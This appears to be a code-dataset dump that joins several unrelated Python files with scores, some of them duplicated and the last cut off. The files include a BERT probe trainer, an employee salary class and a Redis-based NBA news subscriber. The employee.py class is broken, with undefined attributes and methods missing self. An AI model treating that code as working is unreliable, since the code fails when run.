return UiObjectLocator(filters={'resourceId': resource_id})
# uses content-desc if it's available
content_desc = info['contentDescription']
if content_desc and unique(description=content_desc):
return UiObjectLocator(filters={'description': content_desc})
# uses text if it's available
if info['text'] and unique(text=info['text']):
return UiObjectLocator(filters={'text': info['text']})
# uses text if it's available
class_name = info['className']
if class_name and unique(className=class_name):
return UiObjectLocator(filters={'className': class_name})
return None | 0.74826 | 0.383815 |
from pathlib import Path
import multiprocessing as mp
from torch.optim import Adam
from torch.optim.lr_scheduler import ReduceLROnPlateau
from tqdm import tqdm
from transformers import AutoTokenizer, BertForMaskedLM, BertForSequenceClassification, AutoConfig, BertModel
import torch
import torch.utils.data as tud
from .args import ArgumentParserBuilder, OptionEnum, opt
from vizbert.data import ConllTextCollator, TrainingWorkspace, ClassificationCollator, DATA_WORKSPACE_CLASSES, ZeroMeanTransform
from vizbert.inject import ModelInjector, BertHiddenLayerInjectionHook, ProbeReportingModule
from vizbert.model import ProjectionPursuitProbe, EntropyLoss, ModelTrainer, LOSS_KEY, LOSS_SIZE_KEY, MaskedConceptLoss,\
ReconstructionLoss
def train(args):
def entropy_feeder(_, batch):
token_ids = batch.token_ids.to(args.device)
scores = model(token_ids, attention_mask=batch.attention_mask.to(args.device))[0]
loss = neg_entropy = criterion(scores)
if args.dual:
probe.inverse = not probe.inverse
recon_scores = model(token_ids,
attention_mask=batch.attention_mask.to(args.device),
token_type_ids=batch.segment_ids.to(args.device))[0]
gold_scores = model2(token_ids,
attention_mask=batch.attention_mask.to(args.device),
token_type_ids=batch.segment_ids.to(args.device))[0]
probe.inverse = not probe.inverse
loss += recon_criterion(recon_scores.softmax(-1), gold_scores.softmax(-1)) # TODO: multilabel
model.zero_grad()
model2.zero_grad()
return {LOSS_KEY: loss,
LOSS_SIZE_KEY: token_ids.size(0),
'entropy': -neg_entropy}
def recon_feeder(_, batch):
token_ids = batch.token_ids.to(args.device)
scores = model(token_ids, attention_mask=batch.attention_mask.to(args.device))[0]
gold_scores = model2(token_ids,
attention_mask=batch.attention_mask.to(args.device),
token_type_ids=batch.segment_ids.to(args.device))[0]
loss = criterion(scores, gold_scores) # TODO: multilabel
model.zero_grad()
model2.zero_grad()
return {LOSS_KEY: loss,
LOSS_SIZE_KEY: token_ids.size(0)}
dw = DATA_WORKSPACE_CLASSES[args.dataset](args.data_folder)
train_ds, dev_ds, test_ds = dw.load_splits()
if args.dataset == 'conll':
model = BertForMaskedLM.from_pretrained(args.model).to(args.device)
model2 = BertForMaskedLM.from_pretrained(args.model).to(args.device)
else:
config = AutoConfig.from_pretrained(args.model)
config.num_labels = train_ds.num_labels
model = BertForSequenceClassification.from_pretrained(args.model, config=config).to(args.device)
model2 = BertForSequenceClassification.from_pretrained(args.model, config=config).to(args.device)
if args.load_weights:
model.load_state_dict(torch.load(str(args.load_weights / 'model.pt')))
model2.load_state_dict(torch.load(str(args.load_weights / 'model.pt')))
for rank in args.ranks:
probe = ProjectionPursuitProbe(args.num_features,
rank=rank,
optimize_mean=args.optimize_mean,
inverse=args.inverse).to(args.device)
recon_criterion = torch.nn.L1Loss()
hook = BertHiddenLayerInjectionHook(probe, args.layer_idx - 1)
injector = ModelInjector(model.bert, hooks=[hook])
workspace = TrainingWorkspace(Path(f'{args.workspace_prefix}-r{rank}'))
if args.load_probe:
sd = workspace.load_model(probe)
for _, param in zip((k for k in sd if k.startswith('probe_params')), probe.probe_params):
param.requires_grad = False
tok_config = {}
if 'bert' in args.model:
tok_config['do_basic_tokenize'] = args.basic_tokenize
tokenizer = AutoTokenizer.from_pretrained(args.model, **tok_config)
if args.objective == 'entropy':
criterion = EntropyLoss()
elif args.objective == 'concept':
criterion = MaskedConceptLoss(multilabel=dev_ds.multilabel,
weight=args.mask_weight,
inverse=args.inverse)
elif args.objective == 'recon':
criterion = ReconstructionLoss(multilabel=dev_ds.multilabel)
feeder = entropy_feeder if args.objective == 'entropy' else recon_feeder
if args.dataset == 'conll':
collator = ConllTextCollator(tokenizer)
else:
collator = ClassificationCollator(tokenizer, max_length=args.max_seq_len, multilabel=dev_ds.multilabel)
train_loader = tud.DataLoader(train_ds, batch_size=args.batch_size, pin_memory=True, collate_fn=collator,
shuffle=True, num_workers=args.num_workers)
dev_loader = tud.DataLoader(dev_ds, batch_size=args.batch_size, pin_memory=True, collate_fn=collator,
num_workers=args.num_workers)
test_loader = tud.DataLoader(test_ds, batch_size=args.batch_size, pin_memory=True, collate_fn=collator,
num_workers=args.num_workers)
model.eval()
model2.eval()
if args.use_zmt:
zmt = ZeroMeanTransform(768, 2).to(args.device)
reporting_module = ProbeReportingModule()
t_hook = BertHiddenLayerInjectionHook(reporting_module, args.layer_idx - 1)
zmt_injector = ModelInjector(model.bert, hooks=[t_hook])
with zmt_injector:
for idx, batch in enumerate(
tqdm(train_loader, total=min(len(train_loader), args.zmt_limit), desc='Computing ZMT')):
model(batch.token_ids.to(args.device),
attention_mask=batch.attention_mask.to(args.device),
token_type_ids=batch.segment_ids.to(args.device))
zmt.update(reporting_module.buffer,
mask=batch.attention_mask.to(args.device).unsqueeze(-1).expand_as(reporting_module.buffer))
if idx == args.zmt_limit:
break
probe.zmt = zmt
optimizer = Adam(filter(lambda x: x.requires_grad, probe.parameters()), lr=args.lr)
scheduler = ReduceLROnPlateau(optimizer, mode='min', factor=0.5, patience=0)
trainer = ModelTrainer((train_loader, dev_loader, test_loader),
probe,
workspace,
optimizer,
args.num_epochs,
feeder,
optimization_limit=args.opt_limit,
scheduler=scheduler)
if args.eval_only:
with injector:
trainer.evaluate(trainer.dev_loader, 'Dev')
trainer.evaluate(trainer.test_loader, 'Test')
else:
with injector:
trainer.train(test=args.dataset != 'sst2')
def main():
apb = ArgumentParserBuilder()
apb.add_opts(OptionEnum.DATA_FOLDER,
OptionEnum.LAYER_IDX,
OptionEnum.PROBE_RANK,
OptionEnum.MODEL,
OptionEnum.NUM_EPOCHS,
OptionEnum.NUM_WORKERS,
OptionEnum.DEVICE,
OptionEnum.BATCH_SIZE,
OptionEnum.LR,
OptionEnum.EVAL_ONLY,
OptionEnum.USE_ZMT,
OptionEnum.OPTIMIZE_MEAN,
OptionEnum.DATASET,
OptionEnum.MAX_SEQ_LEN,
OptionEnum.INVERSE,
opt('--workspace-prefix', type=str, required=True),
opt('--no-mask-first', action='store_false', dest='mask_first'),
opt('--opt-limit', type=int),
opt('--zmt-limit', type=int, default=1000),
opt('--load-probe', action='store_true'),
opt('--load-weights', type=Path),
opt('--ranks', nargs='+', type=int, default=(1, 2, 3, 6, 12, 24, 48, 96, 192, 384, 576)),
opt('--no-basic-tokenize', action='store_false', dest='basic_tokenize'),
opt('--num-features', type=int, default=768),
opt('--objective', type=str, default='concept', choices=['concept', 'entropy', 'recon']),
opt('--mask-classes', type=int, nargs='+', default=[]),
opt('--l1-penalty', type=float, default=0),
opt('--dual', action='store_true'),
opt('--mask-weight', type=float, default=1))
args = apb.parser.parse_args()
if args.probe_rank:
args.ranks = (args.probe_rank,)
if args.num_workers is None:
args.num_workers = mp.cpu_count()
train(args)
if __name__ == '__main__':
main() | vizbert/run/train_pp_probe.py | from pathlib import Path
import multiprocessing as mp
from torch.optim import Adam
from torch.optim.lr_scheduler import ReduceLROnPlateau
from tqdm import tqdm
from transformers import AutoTokenizer, BertForMaskedLM, BertForSequenceClassification, AutoConfig, BertModel
import torch
import torch.utils.data as tud
from .args import ArgumentParserBuilder, OptionEnum, opt
from vizbert.data import ConllTextCollator, TrainingWorkspace, ClassificationCollator, DATA_WORKSPACE_CLASSES, ZeroMeanTransform
from vizbert.inject import ModelInjector, BertHiddenLayerInjectionHook, ProbeReportingModule
from vizbert.model import ProjectionPursuitProbe, EntropyLoss, ModelTrainer, LOSS_KEY, LOSS_SIZE_KEY, MaskedConceptLoss,\
ReconstructionLoss
def train(args):
def entropy_feeder(_, batch):
token_ids = batch.token_ids.to(args.device)
scores = model(token_ids, attention_mask=batch.attention_mask.to(args.device))[0]
loss = neg_entropy = criterion(scores)
if args.dual:
probe.inverse = not probe.inverse
recon_scores = model(token_ids,
attention_mask=batch.attention_mask.to(args.device),
token_type_ids=batch.segment_ids.to(args.device))[0]
gold_scores = model2(token_ids,
attention_mask=batch.attention_mask.to(args.device),
token_type_ids=batch.segment_ids.to(args.device))[0]
probe.inverse = not probe.inverse
loss += recon_criterion(recon_scores.softmax(-1), gold_scores.softmax(-1)) # TODO: multilabel
model.zero_grad()
model2.zero_grad()
return {LOSS_KEY: loss,
LOSS_SIZE_KEY: token_ids.size(0),
'entropy': -neg_entropy}
def recon_feeder(_, batch):
token_ids = batch.token_ids.to(args.device)
scores = model(token_ids, attention_mask=batch.attention_mask.to(args.device))[0]
gold_scores = model2(token_ids,
attention_mask=batch.attention_mask.to(args.device),
token_type_ids=batch.segment_ids.to(args.device))[0]
loss = criterion(scores, gold_scores) # TODO: multilabel
model.zero_grad()
model2.zero_grad()
return {LOSS_KEY: loss,
LOSS_SIZE_KEY: token_ids.size(0)}
dw = DATA_WORKSPACE_CLASSES[args.dataset](args.data_folder)
train_ds, dev_ds, test_ds = dw.load_splits()
if args.dataset == 'conll':
model = BertForMaskedLM.from_pretrained(args.model).to(args.device)
model2 = BertForMaskedLM.from_pretrained(args.model).to(args.device)
else:
config = AutoConfig.from_pretrained(args.model)
config.num_labels = train_ds.num_labels
model = BertForSequenceClassification.from_pretrained(args.model, config=config).to(args.device)
model2 = BertForSequenceClassification.from_pretrained(args.model, config=config).to(args.device)
if args.load_weights:
model.load_state_dict(torch.load(str(args.load_weights / 'model.pt')))
model2.load_state_dict(torch.load(str(args.load_weights / 'model.pt')))
for rank in args.ranks:
probe = ProjectionPursuitProbe(args.num_features,
rank=rank,
optimize_mean=args.optimize_mean,
inverse=args.inverse).to(args.device)
recon_criterion = torch.nn.L1Loss()
hook = BertHiddenLayerInjectionHook(probe, args.layer_idx - 1)
injector = ModelInjector(model.bert, hooks=[hook])
workspace = TrainingWorkspace(Path(f'{args.workspace_prefix}-r{rank}'))
if args.load_probe:
sd = workspace.load_model(probe)
for _, param in zip((k for k in sd if k.startswith('probe_params')), probe.probe_params):
param.requires_grad = False
tok_config = {}
if 'bert' in args.model:
tok_config['do_basic_tokenize'] = args.basic_tokenize
tokenizer = AutoTokenizer.from_pretrained(args.model, **tok_config)
if args.objective == 'entropy':
criterion = EntropyLoss()
elif args.objective == 'concept':
criterion = MaskedConceptLoss(multilabel=dev_ds.multilabel,
weight=args.mask_weight,
inverse=args.inverse)
elif args.objective == 'recon':
criterion = ReconstructionLoss(multilabel=dev_ds.multilabel)
feeder = entropy_feeder if args.objective == 'entropy' else recon_feeder
if args.dataset == 'conll':
collator = ConllTextCollator(tokenizer)
else:
collator = ClassificationCollator(tokenizer, max_length=args.max_seq_len, multilabel=dev_ds.multilabel)
train_loader = tud.DataLoader(train_ds, batch_size=args.batch_size, pin_memory=True, collate_fn=collator,
shuffle=True, num_workers=args.num_workers)
dev_loader = tud.DataLoader(dev_ds, batch_size=args.batch_size, pin_memory=True, collate_fn=collator,
num_workers=args.num_workers)
test_loader = tud.DataLoader(test_ds, batch_size=args.batch_size, pin_memory=True, collate_fn=collator,
num_workers=args.num_workers)
model.eval()
model2.eval()
if args.use_zmt:
zmt = ZeroMeanTransform(768, 2).to(args.device)
reporting_module = ProbeReportingModule()
t_hook = BertHiddenLayerInjectionHook(reporting_module, args.layer_idx - 1)
zmt_injector = ModelInjector(model.bert, hooks=[t_hook])
with zmt_injector:
for idx, batch in enumerate(
tqdm(train_loader, total=min(len(train_loader), args.zmt_limit), desc='Computing ZMT')):
model(batch.token_ids.to(args.device),
attention_mask=batch.attention_mask.to(args.device),
token_type_ids=batch.segment_ids.to(args.device))
zmt.update(reporting_module.buffer,
mask=batch.attention_mask.to(args.device).unsqueeze(-1).expand_as(reporting_module.buffer))
if idx == args.zmt_limit:
break
probe.zmt = zmt
optimizer = Adam(filter(lambda x: x.requires_grad, probe.parameters()), lr=args.lr)
scheduler = ReduceLROnPlateau(optimizer, mode='min', factor=0.5, patience=0)
trainer = ModelTrainer((train_loader, dev_loader, test_loader),
probe,
workspace,
optimizer,
args.num_epochs,
feeder,
optimization_limit=args.opt_limit,
scheduler=scheduler)
if args.eval_only:
with injector:
trainer.evaluate(trainer.dev_loader, 'Dev')
trainer.evaluate(trainer.test_loader, 'Test')
else:
with injector:
trainer.train(test=args.dataset != 'sst2')
def main():
apb = ArgumentParserBuilder()
apb.add_opts(OptionEnum.DATA_FOLDER,
OptionEnum.LAYER_IDX,
OptionEnum.PROBE_RANK,
OptionEnum.MODEL,
OptionEnum.NUM_EPOCHS,
OptionEnum.NUM_WORKERS,
OptionEnum.DEVICE,
OptionEnum.BATCH_SIZE,
OptionEnum.LR,
OptionEnum.EVAL_ONLY,
OptionEnum.USE_ZMT,
OptionEnum.OPTIMIZE_MEAN,
OptionEnum.DATASET,
OptionEnum.MAX_SEQ_LEN,
OptionEnum.INVERSE,
opt('--workspace-prefix', type=str, required=True),
opt('--no-mask-first', action='store_false', dest='mask_first'),
opt('--opt-limit', type=int),
opt('--zmt-limit', type=int, default=1000),
opt('--load-probe', action='store_true'),
opt('--load-weights', type=Path),
opt('--ranks', nargs='+', type=int, default=(1, 2, 3, 6, 12, 24, 48, 96, 192, 384, 576)),
opt('--no-basic-tokenize', action='store_false', dest='basic_tokenize'),
opt('--num-features', type=int, default=768),
opt('--objective', type=str, default='concept', choices=['concept', 'entropy', 'recon']),
opt('--mask-classes', type=int, nargs='+', default=[]),
opt('--l1-penalty', type=float, default=0),
opt('--dual', action='store_true'),
opt('--mask-weight', type=float, default=1))
args = apb.parser.parse_args()
if args.probe_rank:
args.ranks = (args.probe_rank,)
if args.num_workers is None:
args.num_workers = mp.cpu_count()
train(args)
if __name__ == '__main__':
main() | 0.66061 | 0.348146 |
import requests
class Employee:
min_hourly_wage = 17.91 #LAW
weeks_per_year = 52.0 #assume full-time
hours_per_week = 40.0 #assume full-time
min_superannuation_percent = 9.5
atCompanyDefault="<EMAIL>"
min_salary = min_hourly_wage * hours_per_week * weeks_per_year #LAW #assume full-time
def __init__(self,firstName,lastName,salary_parm=min_salary):
self.firstName=firstName[0].upper() + firstName[1:].lower()
self.lastName=lastName[0].upper() + lastName[1:].lower()
self.fullName = '{} {}'.format(self.firstName,self.lastName)
# self.email()
## tom = self.tell_email()
self.salary=salary_parm
def apply_raise_hidden(self,percent):
new_salary = self.salary * (1 + percent/100)
self.min_salary = self.min_hourly_wage * self.hours_per_week * self.weeks_per_year #LAW #assume full-time
if self.salary < self.min_salary: #LAW #assume full-time
#assume full-time
self.salary = self.min_salary #LAW #assume full-time
print( self.fullName + " is on minimum p.a. " + str(self.min_salary))
else:
self.salary = self.new_salary
def apply_raise_201805():
self.apply_raise_hidden(self,1.0)
def apply_raise_201711():
self.apply_raise_hidden(self,-1.1)
def change_name(self,fullname): #,atCompany=self.atCompanyDefault):
self.fullName=fullname
self.email=name.lower().replace(" ","_") + atCompany
fred = self.tell_email()
print(" new email is "+self.email)
def tell_email(self,url=f"https://www.google.com/"):
response = requests.get(url)
if response.ok:
return response.text
else:
return '_bad response!'
@property
def email(self): #,atCompany=self.atCompanyDefault):
return '{}.{}'.format(self.firstName.lower(),self.lastName.lower())+"@<EMAIL>" #+atCompany | employee.py | import requests
class Employee:
min_hourly_wage = 17.91 #LAW
weeks_per_year = 52.0 #assume full-time
hours_per_week = 40.0 #assume full-time
min_superannuation_percent = 9.5
atCompanyDefault="<EMAIL>"
min_salary = min_hourly_wage * hours_per_week * weeks_per_year #LAW #assume full-time
def __init__(self,firstName,lastName,salary_parm=min_salary):
self.firstName=firstName[0].upper() + firstName[1:].lower()
self.lastName=lastName[0].upper() + lastName[1:].lower()
self.fullName = '{} {}'.format(self.firstName,self.lastName)
# self.email()
## tom = self.tell_email()
self.salary=salary_parm
def apply_raise_hidden(self,percent):
new_salary = self.salary * (1 + percent/100)
self.min_salary = self.min_hourly_wage * self.hours_per_week * self.weeks_per_year #LAW #assume full-time
if self.salary < self.min_salary: #LAW #assume full-time
#assume full-time
self.salary = self.min_salary #LAW #assume full-time
print( self.fullName + " is on minimum p.a. " + str(self.min_salary))
else:
self.salary = self.new_salary
def apply_raise_201805():
self.apply_raise_hidden(self,1.0)
def apply_raise_201711():
self.apply_raise_hidden(self,-1.1)
def change_name(self,fullname): #,atCompany=self.atCompanyDefault):
self.fullName=fullname
self.email=name.lower().replace(" ","_") + atCompany
fred = self.tell_email()
print(" new email is "+self.email)
def tell_email(self,url=f"https://www.google.com/"):
response = requests.get(url)
if response.ok:
return response.text
else:
return '_bad response!'
@property
def email(self): #,atCompany=self.atCompanyDefault):
return '{}.{}'.format(self.firstName.lower(),self.lastName.lower())+"@<EMAIL>" #+atCompany | 0.210848 | 0.064036 |
import datetime
import json
import logging
import logging.config
import redis
from environment import REDIS_URL, REDIS_PLAYER_NEWS_CHANNEL_NAME, REDIS_SUBSCRIBER_EVENTS_CHANNEL_NAME, \
REDIS_SUBSCRIPTION_MESSAGES_CHANNEL_NAME
from nba_player_news.data.publishers import PlayerNewsSubscriptionsMessagesPublisher
from nba_player_news.data.senders import FacebookMessager
from nba_player_news.data.subscriber_event.processors import FacebookSubscriberEventProcessor
from nba_player_news.models import Subscription, SubscriptionAttempt, SubscriptionAttemptResult
class BaseSubscriber:
    """Blocking Redis pub/sub consumer; subclasses implement process_message."""

    logger = logging.getLogger("subscriber")

    def __init__(self, subscription_channel_name):
        self.subscription_channel_name = subscription_channel_name
        # Fix: from_url is a classmethod -- the original
        # redis.StrictRedis().from_url(...) first built a throwaway default
        # client (pointing at localhost) before connecting to REDIS_URL.
        self.redis_client = redis.StrictRedis.from_url(url=REDIS_URL)
        self.publisher_subscriber = self.redis_client.pubsub()

    def process_messages(self):
        """Poll the channel forever, dispatching each payload to process_message."""
        self.publisher_subscriber.subscribe(self.subscription_channel_name)
        BaseSubscriber.logger.info("Started processing messages at {now}".format(now=datetime.datetime.now()))
        while True:  # NOTE(review): busy-polls get_message(); consider a short sleep or listen()
            message = self.publisher_subscriber.get_message()
            if message and message["type"] == "message":
                BaseSubscriber.logger.info("Processing message: {message}".format(message=message))
                try:
                    self.process_message(message=json.loads(message["data"]))
                except BaseException:
                    # Catch everything so the subscriber loop never dies.
                    # Fix: log the full traceback; the original read
                    # e.message, which does not exist on Python 3 exceptions.
                    BaseSubscriber.logger.exception("Failed to process message")

    def process_message(self, message):
        """Handle one decoded message; must be overridden by subclasses."""
        raise NotImplementedError()
class PlayerNewsSubscriber(BaseSubscriber):
    """Re-publishes raw player news onto the per-subscriber message channel."""

    def __init__(self):
        BaseSubscriber.__init__(self, REDIS_PLAYER_NEWS_CHANNEL_NAME)
        self.player_news_subscriptions_messages_publisher = PlayerNewsSubscriptionsMessagesPublisher()

    def process_message(self, message):
        """Forward one decoded player-news payload to the subscriptions publisher."""
        publisher = self.player_news_subscriptions_messages_publisher
        publisher.publish(player_news=message)
class SubscriberEventsSubscriber(BaseSubscriber):
    """Routes subscriber (sign-up / unsubscribe) events to a platform processor."""

    def __init__(self):
        self.facebook_subscriber_event_processor = FacebookSubscriberEventProcessor()
        BaseSubscriber.__init__(self, REDIS_SUBSCRIBER_EVENTS_CHANNEL_NAME)

    def process_message(self, message):
        """Dispatch on message["platform"]; only Facebook is supported."""
        if message["platform"] == "facebook":
            self.facebook_subscriber_event_processor.process(subscriber_event_message=message)
        else:
            # Fix: log via this class's own (inherited) logger; the original
            # reached into the unrelated PlayerNewsSubscriber class.
            SubscriberEventsSubscriber.logger.info("Unknown message: {message}".format(message=message))
class SubscriptionMessagesSubscriber(BaseSubscriber):
    """Delivers outbound subscription messages and records each attempt."""

    def __init__(self):
        self.facebook_messager = FacebookMessager()
        BaseSubscriber.__init__(self, REDIS_SUBSCRIPTION_MESSAGES_CHANNEL_NAME)

    def process_message(self, message):
        """Send message["text"] to its recipient and persist the result.

        Fixes: logs via this class's own logger (the original used
        PlayerNewsSubscriber's), and skips the Subscription lookup for
        unsupported platforms -- the original hit the database before
        checking the platform.
        """
        if message["platform"] != "facebook":
            SubscriptionMessagesSubscriber.logger.info("Unknown message: {}".format(message))
            return
        subscription = Subscription.objects.get(platform=message["platform"],
                                                platform_identifier=message["platform_identifier"])
        SubscriptionMessagesSubscriber.logger.info(
            "Sending message: {message} to user: {user}".format(
                message=message["text"], user=message["platform_identifier"]))
        # Message/response columns are capped at 2048 characters.
        subscription_attempt = SubscriptionAttempt.objects.create(
            subscription=subscription, message=message["text"][:2048])
        response = self.facebook_messager.send(
            recipient_id=message["platform_identifier"], message=message["text"])
        SubscriptionAttemptResult.objects.create(
            subscription_attempt=subscription_attempt,
            successful=response.status_code == 200,
            response=response.text[:2048])
class AllSubscribers:
    """Polls all three Redis channels in a single process (Heroku cost saver).

    Fixes: from_url called as a classmethod (the original built a throwaway
    localhost client first); e.message replaced with logger.exception
    (Python 3 exceptions have no .message); the duplicated poll/decode/guard
    logic factored into _dispatch; unknown-platform logging now uses this
    class's logger instead of PlayerNewsSubscriber's. Extraction residue
    fused onto the final line removed.
    """

    logger = logging.getLogger("subscriber")

    def __init__(self):
        self.facebook_subscriber_event_processor = FacebookSubscriberEventProcessor()
        self.facebook_messager = FacebookMessager()
        self.redis_client = redis.StrictRedis.from_url(url=REDIS_URL)
        self.player_news_publisher_subscriber = self.redis_client.pubsub()
        self.subscriber_events_publisher_subscriber = self.redis_client.pubsub()
        self.subscription_messages_publisher_subscriber = self.redis_client.pubsub()
        self.player_news_publisher_subscriber.subscribe(REDIS_PLAYER_NEWS_CHANNEL_NAME)
        self.subscriber_events_publisher_subscriber.subscribe(REDIS_SUBSCRIBER_EVENTS_CHANNEL_NAME)
        self.subscription_messages_publisher_subscriber.subscribe(REDIS_SUBSCRIPTION_MESSAGES_CHANNEL_NAME)
        self.player_news_subscriptions_messages_publisher = PlayerNewsSubscriptionsMessagesPublisher()

    def _dispatch(self, publisher_subscriber, handler):
        """Poll one pubsub channel once; decode and hand off, never raising."""
        message = publisher_subscriber.get_message()
        if message and message["type"] == "message":
            try:
                handler(json.loads(message["data"]))
            except BaseException:
                # Catch everything so the combined subscriber loop never dies.
                AllSubscribers.logger.exception("Failed to process message")

    def process_messages(self):
        """Round-robin over the three channels forever."""
        AllSubscribers.logger.info("Started subscribing to all messages at {now}".format(now=datetime.datetime.now()))
        while True:  # NOTE(review): busy-polls; consider a short sleep per cycle
            self._dispatch(self.player_news_publisher_subscriber,
                           lambda m: self.player_news_subscriptions_messages_publisher.publish(player_news=m))
            self._dispatch(self.subscriber_events_publisher_subscriber,
                           lambda m: self.process_subscriber_message(message=m))
            self._dispatch(self.subscription_messages_publisher_subscriber,
                           lambda m: self.process_subscription_message(message=m))

    def process_subscriber_message(self, message):
        """Route a subscriber event to its platform processor."""
        if message["platform"] == "facebook":
            self.facebook_subscriber_event_processor.process(subscriber_event_message=message)
        else:
            AllSubscribers.logger.info("Unknown message: {}".format(message))

    def process_subscription_message(self, message):
        """Send a subscription message via Facebook and persist the attempt."""
        if message["platform"] != "facebook":
            # Unsupported platform: no DB lookup needed (the original queried
            # Subscription before checking the platform).
            AllSubscribers.logger.info("Unknown message: {}".format(message))
            return
        subscription = Subscription.objects.get(platform=message["platform"],
                                                platform_identifier=message["platform_identifier"])
        AllSubscribers.logger.info("Sending message: {message} to user: {user}".format(
            message=message["text"], user=message["platform_identifier"]))
        subscription_attempt = SubscriptionAttempt.objects.create(
            subscription=subscription, message=message["text"][:2048])
        response = self.facebook_messager.send(
            recipient_id=message["platform_identifier"], message=message["text"])
        SubscriptionAttemptResult.objects.create(
            subscription_attempt=subscription_attempt,
            successful=response.status_code == 200,
            response=response.text[:2048])
import json
import logging
import logging.config
import redis
from environment import REDIS_URL, REDIS_PLAYER_NEWS_CHANNEL_NAME, REDIS_SUBSCRIBER_EVENTS_CHANNEL_NAME, \
REDIS_SUBSCRIPTION_MESSAGES_CHANNEL_NAME
from nba_player_news.data.publishers import PlayerNewsSubscriptionsMessagesPublisher
from nba_player_news.data.senders import FacebookMessager
from nba_player_news.data.subscriber_event.processors import FacebookSubscriberEventProcessor
from nba_player_news.models import Subscription, SubscriptionAttempt, SubscriptionAttemptResult
class BaseSubscriber:
    """Blocking Redis pub/sub consumer; subclasses implement process_message."""

    logger = logging.getLogger("subscriber")

    def __init__(self, subscription_channel_name):
        self.subscription_channel_name = subscription_channel_name
        # Fix: from_url is a classmethod -- the original
        # redis.StrictRedis().from_url(...) first built a throwaway default
        # client (pointing at localhost) before connecting to REDIS_URL.
        self.redis_client = redis.StrictRedis.from_url(url=REDIS_URL)
        self.publisher_subscriber = self.redis_client.pubsub()

    def process_messages(self):
        """Poll the channel forever, dispatching each payload to process_message."""
        self.publisher_subscriber.subscribe(self.subscription_channel_name)
        BaseSubscriber.logger.info("Started processing messages at {now}".format(now=datetime.datetime.now()))
        while True:  # NOTE(review): busy-polls get_message(); consider a short sleep or listen()
            message = self.publisher_subscriber.get_message()
            if message and message["type"] == "message":
                BaseSubscriber.logger.info("Processing message: {message}".format(message=message))
                try:
                    self.process_message(message=json.loads(message["data"]))
                except BaseException:
                    # Catch everything so the subscriber loop never dies.
                    # Fix: log the full traceback; the original read
                    # e.message, which does not exist on Python 3 exceptions.
                    BaseSubscriber.logger.exception("Failed to process message")

    def process_message(self, message):
        """Handle one decoded message; must be overridden by subclasses."""
        raise NotImplementedError()
class PlayerNewsSubscriber(BaseSubscriber):
    """Re-publishes raw player news onto the per-subscriber message channel."""

    def __init__(self):
        BaseSubscriber.__init__(self, REDIS_PLAYER_NEWS_CHANNEL_NAME)
        self.player_news_subscriptions_messages_publisher = PlayerNewsSubscriptionsMessagesPublisher()

    def process_message(self, message):
        """Forward one decoded player-news payload to the subscriptions publisher."""
        publisher = self.player_news_subscriptions_messages_publisher
        publisher.publish(player_news=message)
class SubscriberEventsSubscriber(BaseSubscriber):
    """Routes subscriber (sign-up / unsubscribe) events to a platform processor."""

    def __init__(self):
        self.facebook_subscriber_event_processor = FacebookSubscriberEventProcessor()
        BaseSubscriber.__init__(self, REDIS_SUBSCRIBER_EVENTS_CHANNEL_NAME)

    def process_message(self, message):
        """Dispatch on message["platform"]; only Facebook is supported."""
        if message["platform"] == "facebook":
            self.facebook_subscriber_event_processor.process(subscriber_event_message=message)
        else:
            # Fix: log via this class's own (inherited) logger; the original
            # reached into the unrelated PlayerNewsSubscriber class.
            SubscriberEventsSubscriber.logger.info("Unknown message: {message}".format(message=message))
class SubscriptionMessagesSubscriber(BaseSubscriber):
    """Delivers outbound subscription messages and records each attempt."""

    def __init__(self):
        self.facebook_messager = FacebookMessager()
        BaseSubscriber.__init__(self, REDIS_SUBSCRIPTION_MESSAGES_CHANNEL_NAME)

    def process_message(self, message):
        """Send message["text"] to its recipient and persist the result.

        Fixes: logs via this class's own logger (the original used
        PlayerNewsSubscriber's), and skips the Subscription lookup for
        unsupported platforms -- the original hit the database before
        checking the platform.
        """
        if message["platform"] != "facebook":
            SubscriptionMessagesSubscriber.logger.info("Unknown message: {}".format(message))
            return
        subscription = Subscription.objects.get(platform=message["platform"],
                                                platform_identifier=message["platform_identifier"])
        SubscriptionMessagesSubscriber.logger.info(
            "Sending message: {message} to user: {user}".format(
                message=message["text"], user=message["platform_identifier"]))
        # Message/response columns are capped at 2048 characters.
        subscription_attempt = SubscriptionAttempt.objects.create(
            subscription=subscription, message=message["text"][:2048])
        response = self.facebook_messager.send(
            recipient_id=message["platform_identifier"], message=message["text"])
        SubscriptionAttemptResult.objects.create(
            subscription_attempt=subscription_attempt,
            successful=response.status_code == 200,
            response=response.text[:2048])
class AllSubscribers:
    """Polls all three Redis channels in a single process (Heroku cost saver).

    Fixes: from_url called as a classmethod (the original built a throwaway
    localhost client first); e.message replaced with logger.exception
    (Python 3 exceptions have no .message); the duplicated poll/decode/guard
    logic factored into _dispatch; unknown-platform logging now uses this
    class's logger instead of PlayerNewsSubscriber's. Extraction residue
    fused onto the final line removed.
    """

    logger = logging.getLogger("subscriber")

    def __init__(self):
        self.facebook_subscriber_event_processor = FacebookSubscriberEventProcessor()
        self.facebook_messager = FacebookMessager()
        self.redis_client = redis.StrictRedis.from_url(url=REDIS_URL)
        self.player_news_publisher_subscriber = self.redis_client.pubsub()
        self.subscriber_events_publisher_subscriber = self.redis_client.pubsub()
        self.subscription_messages_publisher_subscriber = self.redis_client.pubsub()
        self.player_news_publisher_subscriber.subscribe(REDIS_PLAYER_NEWS_CHANNEL_NAME)
        self.subscriber_events_publisher_subscriber.subscribe(REDIS_SUBSCRIBER_EVENTS_CHANNEL_NAME)
        self.subscription_messages_publisher_subscriber.subscribe(REDIS_SUBSCRIPTION_MESSAGES_CHANNEL_NAME)
        self.player_news_subscriptions_messages_publisher = PlayerNewsSubscriptionsMessagesPublisher()

    def _dispatch(self, publisher_subscriber, handler):
        """Poll one pubsub channel once; decode and hand off, never raising."""
        message = publisher_subscriber.get_message()
        if message and message["type"] == "message":
            try:
                handler(json.loads(message["data"]))
            except BaseException:
                # Catch everything so the combined subscriber loop never dies.
                AllSubscribers.logger.exception("Failed to process message")

    def process_messages(self):
        """Round-robin over the three channels forever."""
        AllSubscribers.logger.info("Started subscribing to all messages at {now}".format(now=datetime.datetime.now()))
        while True:  # NOTE(review): busy-polls; consider a short sleep per cycle
            self._dispatch(self.player_news_publisher_subscriber,
                           lambda m: self.player_news_subscriptions_messages_publisher.publish(player_news=m))
            self._dispatch(self.subscriber_events_publisher_subscriber,
                           lambda m: self.process_subscriber_message(message=m))
            self._dispatch(self.subscription_messages_publisher_subscriber,
                           lambda m: self.process_subscription_message(message=m))

    def process_subscriber_message(self, message):
        """Route a subscriber event to its platform processor."""
